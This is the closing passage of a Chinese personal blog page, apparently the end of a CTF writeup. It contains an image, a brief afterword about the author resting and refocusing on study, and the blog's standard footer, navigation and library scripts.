class="number">1</span>&#125;)</span><br></pre></td></tr></table></figure></div>

<p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g33138aof9j30mt05cmxe.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g33138aof9j30mt05cmxe.jpg" class="lazyload"></a></p>
<hr>
<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>最近状态有所松懈，注意休息，安心学习，努力静下心来</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Manayakko</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://manayakko.github.io/yakko117/2019/05/16/love_math/">https://manayakko.github.io/yakko117/2019/05/16/love_math/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://manayakko.github.io/yakko117">Manayakko - 微笑才是王道</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/yakko117/tags/ctf/">ctf    </a><a class="post-meta__tags" href="/yakko117/tags/writeup/">writeup    </a></div><div class="post_share"><div class="social-share" data-image="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g33138jvy6j31hc0u01kx.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js"></script></div></div><div class="post-reward"><a class="reward-button button--primary button--animated"> <i class="fa fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><img class="lazyload post-qr-code__img" src="/yakko117/img/Wechat.jpg" alt="微信"><div class="post-qr-code__desc">微信</div></li></ul></div></a></div><nav class="pagination_post" id="pagination"><div class="prev-post pull_left"><a href="/yakko117/2019/07/07/hacker101/"><img class="prev_cover lazyload" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/006dMd5bgy1gc8zk045t7j30g10fm75g.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="label">上一篇</div><div class="prev_info"><span>Hacker101 CTF writeup</span></div></a></div><div class="next-post pull_right"><a href="/yakko117/2019/04/18/DDctf2019/"><img class="next_cover lazyload" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g26qruutkzj309a065dg3.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="label">下一篇</div><div class="next_info"><span>2019“弟弟吹头发”wp</span></div></a></div></nav><div class="relatedPosts"><div class="relatedPosts_headline"><i class="fa fa-fw fa-thumbs-up" aria-hidden="true"></i><span> 相关推荐</span></div><div class="relatedPosts_list"><div class="relatedPosts_item"><a href="/yakko117/2020/01/31/2020新春红包/" title="赵师傅的新春红包题"><img class="relatedPosts_cover lazyload"data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img2/redpack.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-history fa-fw" aria-hidden="true"></i> 2020-01-31</div><div class="relatedPosts_title">赵师傅的新春红包题</div></div></a></div><div class="relatedPosts_item"><a href="/yakko117/2022/01/04/BUUCTFDay10/" title="BuuctfDay10"><img class="relatedPosts_cover lazyload"data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/9a88975fec4255819a88f8d9c73c8948.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-history fa-fw" aria-hidden="true"></i> 2022-12-11</div><div class="relatedPosts_title">BuuctfDay10</div></div></a></div><div class="relatedPosts_item"><a href="/yakko117/2019/04/05/Bugkuctf/" title="Bugku吹头发 writeup（慢慢更）"><img class="relatedPosts_cover lazyload"data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/6b8c14f8gy1fvcdnepp5yj218g0tn48s.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-history fa-fw" aria-hidden="true"></i> 2019-04-05</div><div class="relatedPosts_title">Bugku吹头发 writeup（慢慢更）</div></div></a></div></div><div class="clear_both"></div></div></div></main><footer id="footer" style="background-image: url(https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g33138jvy6j31hc0u01kx.jpg)" data-type="photo"><div id="footer-wrap"><div class="copyright">&copy;2019 - 2023 By Manayakko</div><div class="framework-info"><span>驱动 </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 </span><a href="https://github.com/jerryc127/hexo-theme-butterfly" target="_blank" rel="noopener"><span>Butterfly</span></a></div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><i class="fa fa-book" id="readmode" title="阅读模式"></i><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="简繁转换" target="_self">繁</a><i class="darkmode fa fa-moon-o" id="darkmode" title="夜间模式"></i></div><div id="rightside-config-show"><div id="rightside_config" title="设置"><i class="fa fa-cog" aria-hidden="true"></i></div><i class="fa fa-list-ul close" id="mobile-toc-button" title="目录" aria-hidden="true"></i><i class="fa fa-arrow-up" id="go-up" title="回到顶部" aria-hidden="true"></i></div></section><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/yakko117/js/utils.js"></script><script src="/yakko117/js/main.js"></script><script src="/yakko117/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script type="text/x-mathjax-config">MathJax.Hub.Config({
  tex2jax: {
    inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
    processEscapes: true,
    skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
  },
  CommonHTML: {
    linebreaks: { automatic: true, width: "90% container" }
  },
  "HTML-CSS": { 
    linebreaks: { automatic: true, width: "90% container" }
  },
  "SVG": { 
    linebreaks: { automatic: true, width: "90% container" }
  }
});
</script><script type="text/x-mathjax-config">MathJax.Hub.Queue(function() {
  var all = MathJax.Hub.getAllJax(), i;
  for (i=0; i < all.length; i += 1) {
    all[i].SourceElement().parentNode.className += ' has-jax';
  }
});
</script><script src="https://cdn.jsdelivr.net/npm/mathjax/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex@latest/dist/katex.min.css"><script src="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.js"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.css"><script>$(function () {
  $('span.katex-display').wrap('<div class="katex-wrap"></div>')
})</script><script src="https://cdn.jsdelivr.net/npm/instant.page@latest/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/lazysizes@latest/lazysizes.min.js" async=""></script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a href="https://github.com/wzpan/hexo-generator-search" target="_blank" rel="noopener" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div><script src="/yakko117/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/yakko117/live2dw/assets/assets/shizuku.model.json"},"display":{"position":"right","hOffset":60,"vOffset":-20,"width":90,"height":180},"mobile":{"show":false},"log":false});</script></body></html>